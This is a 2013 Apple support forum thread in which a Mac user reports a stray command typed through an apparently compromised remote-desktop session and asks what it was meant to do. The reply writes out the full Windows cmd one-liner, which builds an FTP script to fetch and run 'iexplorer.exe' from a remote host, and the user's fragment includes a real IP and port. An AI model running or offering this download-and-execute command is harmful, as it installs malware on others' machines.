Skip navigation

being hacked - What was he trying to do?

666 Views 1 Reply Latest reply: Jan 12, 2013 12:52 PM by TeenTitan RSS
fightdemon Calculating status...
Currently Being Moderated
Jan 8, 2013 8:03 PM

Hi,

 

I was working really late one day and opened and email to type in a message and my keyboard went funny for a second and this line appeared in my email:

 

lelesa%system32 [... rest lost... ]

del eq&echo open 190.208.147.73 15588 >> eq&echo user 1386 21513 >> eq &echo get iexplor

 

The beginning was cut off from my own typing and the end cut off because I disconnected from the net and VPN I was using.

 

Remote desktop was on and has a strong password to prevent anyone from accessing it. I use PocketCompanion to acces my mac from my iPad.

 

I've sense removed Remote Desktop/PocketCloud.

 

My questions is

1) do you know what they were trying to do from that partial command they were typing? From the System32 and iexplor reference it seems they thought I was on a PC.

2) what happened to allow me to catch them typing by me openeing an email.  I would expect they would have been trying to do this in the background in terminal or something. Seems like I got lucky to see that. Maybe because I am not on a PC something didn't execute right?

3) any thoughts on how to stop this from happening again?

 

Thanks.

Mac OS X (10.6.8)
  • TeenTitan Level 4 Level 4 (2,410 points)
    Currently Being Moderated
    Jan 12, 2013 12:52 PM (in response to fightdemon)

    If you google around you'll probable find posts like yours from mac, windows, and other operating systems users. Where VNC was turned on, with a easily gussed password.

     

    googling I found:

    %systemroot%\system32\cmd.exe del eq&echo open ipAddress port >> eq&echo user Number Number >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq j

     

     

    There are sevreal known pc viruses that try to vnc into computers an issue similar commands. It look like it was trying to remote into a pc, open the pc command line, and then then make the machine connect to another computer to download some thing, most liekly a virus or get data off of the pc.

Actions

More Like This

  • Retrieving data ...

Bookmarked By (0)

Legend

  • This solved my question - 10 points
  • This helped me - 5 points
This site contains user submitted content, comments and opinions and is for informational purposes only. Apple disclaims any and all liability for the acts, omissions and conduct of any third parties in connection with or related to your use of the site. All postings and use of the content on this site are subject to the Apple Support Communities Terms of Use.